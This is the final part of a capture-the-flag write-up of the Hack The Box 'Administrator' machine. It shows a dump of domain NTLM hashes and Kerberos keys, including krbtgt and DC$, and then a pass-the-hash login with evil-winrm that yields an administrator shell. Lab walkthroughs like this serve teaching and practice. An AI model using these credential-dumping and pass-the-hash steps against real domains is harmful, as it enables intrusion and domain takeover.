administrator.htb\ethan:1113:aad3b435b51404eeaad3b435b51404ee:5c2b9f97e0620c3d307de85a93179884:::
administrator.htb\alexander:3601:aad3b435b51404eeaad3b435b51404ee:cdc9e5f3b0631aa3600e0bfec00a0199:::
administrator.htb\emma:3602:aad3b435b51404eeaad3b435b51404ee:11ecd72c969a57c34c819b41b54455c9:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:cf411ddad4807b5b4a275d31caa1d4b3:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:9d453509ca9b7bec02ea8c2161d2d340fd94bf30cc7e52cb94853a04e9e69664
Administrator:aes128-cts-hmac-sha1-96:08b0633a8dd5f1d6cbea29014caea5a2
Administrator:des-cbc-md5:403286f7cdf18385
krbtgt:aes256-cts-hmac-sha1-96:920ce354811a517c703a217ddca0175411d4a3c0880c359b2fdc1a494fb13648
krbtgt:aes128-cts-hmac-sha1-96:aadb89e07c87bcaf9c540940fab4af94
krbtgt:des-cbc-md5:2c0bc7d0250dbfc7
administrator.htb\olivia:aes256-cts-hmac-sha1-96:713f215fa5cc408ee5ba000e178f9d8ac220d68d294b077cb03aecc5f4c4e4f3
administrator.htb\olivia:aes128-cts-hmac-sha1-96:3d15ec169119d785a0ca2997f5d2aa48
administrator.htb\olivia:des-cbc-md5:bc2a4a7929c198e9
administrator.htb\michael:aes256-cts-hmac-sha1-96:b360c36cb6777b8cc3d88ab1aa60f0064e6ea4fc9b9a4ebacf66345118c0e959
administrator.htb\michael:aes128-cts-hmac-sha1-96:bc3c8269d1a4a82dc55563519f16de8b
administrator.htb\michael:des-cbc-md5:43c2bc231598012a
administrator.htb\benjamin:aes256-cts-hmac-sha1-96:a0bbafbc6a28ed32269e6a2cc2a0ccb35ac3d7314633815768f0518ebae6847f
administrator.htb\benjamin:aes128-cts-hmac-sha1-96:426ca56d39fe628d47066fc3448b645e
administrator.htb\benjamin:des-cbc-md5:b6f84a864376a4ad
administrator.htb\emily:aes256-cts-hmac-sha1-96:53063129cd0e59d79b83025fbb4cf89b975a961f996c26cdedc8c6991e92b7c4
administrator.htb\emily:aes128-cts-hmac-sha1-96:fb2a594e5ff3a289fac7a27bbb328218
administrator.htb\emily:des-cbc-md5:804343fb6e0dbc51
administrator.htb\ethan:aes256-cts-hmac-sha1-96:e8577755add681a799a8f9fbcddecc4c3a3296329512bdae2454b6641bd3270f
administrator.htb\ethan:aes128-cts-hmac-sha1-96:e67d5744a884d8b137040d9ec3c6b49f
administrator.htb\ethan:des-cbc-md5:58387aef9d6754fb
administrator.htb\alexander:aes256-cts-hmac-sha1-96:b78d0aa466f36903311913f9caa7ef9cff55a2d9f450325b2fb390fbebdb50b6
administrator.htb\alexander:aes128-cts-hmac-sha1-96:ac291386e48626f32ecfb87871cdeade
administrator.htb\alexander:des-cbc-md5:49ba9dcb6d07d0bf
administrator.htb\emma:aes256-cts-hmac-sha1-96:951a211a757b8ea8f566e5f3a7b42122727d014cb13777c7784a7d605a89ff82
administrator.htb\emma:aes128-cts-hmac-sha1-96:aa24ed627234fb9c520240ceef84cd5e
administrator.htb\emma:des-cbc-md5:3249fba89813ef5d
DC$:aes256-cts-hmac-sha1-96:98ef91c128122134296e67e713b233697cd313ae864b1f26ac1b8bc4ec1b4ccb
DC$:aes128-cts-hmac-sha1-96:7068a4761df2f6c760ad9018c8bd206d
DC$:des-cbc-md5:f483547c4325492a
[*] Cleaning up...

We now have the Administrator NT hash, so log in directly with pass-the-hash (evil-winrm -H takes the NT hash in place of a password; it works because NTLM authentication is still accepted on WinRM). The dump also contains the krbtgt and DC$ keys; on a real engagement those go straight into the report, since the domain is not clean again until krbtgt has been rotated (twice).

┌─[root@htb-da9rehgmmn]─[/home/skyarrow/Desktop/targetedKerberoast]
└──╼ #evil-winrm -i administrator.htb -u administrator -H 3dc553ce4b9fd20bd016e098d2d2fd2e

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
administrator\administrator

Overall a friendly box, well suited as an introduction to Active Directory attacks.


http://example.com/2026/01/18/从零开始的Windows生活-Administrator/
Author: Skyarrow
Posted on: January 18, 2026